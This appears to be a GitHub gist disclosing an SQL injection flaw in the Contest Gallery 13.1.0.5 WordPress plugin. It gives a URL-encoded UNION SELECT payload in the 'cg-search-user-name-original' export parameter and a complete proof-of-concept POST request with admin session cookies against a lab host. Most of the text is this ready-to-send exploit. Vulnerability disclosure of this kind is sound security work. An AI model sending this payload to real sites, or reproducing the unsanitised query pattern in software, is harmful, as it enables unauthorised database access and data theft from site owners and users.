Skip to content

Instantly share code, notes, and snippets.

@tpmiller87
Created October 27, 2021 02:24
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save tpmiller87/6c05596fe27dd6f69f1aaba4cbb9c917 to your computer and use it in GitHub Desktop.
Save tpmiller87/6c05596fe27dd6f69f1aaba4cbb9c917 to your computer and use it in GitHub Desktop.
Contest Gallery 13.1.0.5 SQL injection
In Contest Gallery Version 13.1.0.5 an SQL injection vulnerability exists when exporting user data. Found by navigating to "Edit gallery > Users Management > Export Users Data", the "cg-search-user-name-original" parameter is not sanitized properly, allowing for injection.
An example payload revealing victim version:
%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-
POC:
POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1
Host: 172.16.11.129
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.11.129/wp-admin/admin.php?page=contest-gallery%2Findex.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 318
Origin: http://172.16.11.129
Connection: close
Cookie: wordpress_645ea7237dc6755739a03b4455ae6c84=admin%7C1635445738%7CxypGymRlWrsbkVJOycKXrg6nQUSmSoEAPdKXhXtimZz%7C51459f3bc62cef4c77ed5b6eec3b8a3206455571db5d4f9d9639fff872bb419d; __wpdm_client=cfd314b95620d7774c7a871eed8b3bbb; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; wp-settings-time-1=1635273846; __utma=115262919.1935608114.1635126281.1635126281.1635126281.1; __utmz=115262919.1635126281.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=ov80k0rg7niu38l6ovdk57d3oq; wordpress_logged_in_645ea7237dc6755739a03b4455ae6c84=admin%7C1635445738%7CxypGymRlWrsbkVJOycKXrg6nQUSmSoEAPdKXhXtimZz%7C9fbda8829a9f2412f94c97048e80167d57764a24a8d472ce25a8e6d2d523c1a9
Upgrade-Insecure-Requests: 1
cg-search-user-name=&cg-search-user-name-original=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-&cg_create_user_data_csv_new_export=true&cg-search-gallery-id-original=&cg-search-gallery-id=&cg_create_user_data_csv=true
@tpmiller87
Copy link
Author

export_button
intercepted_sqli

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment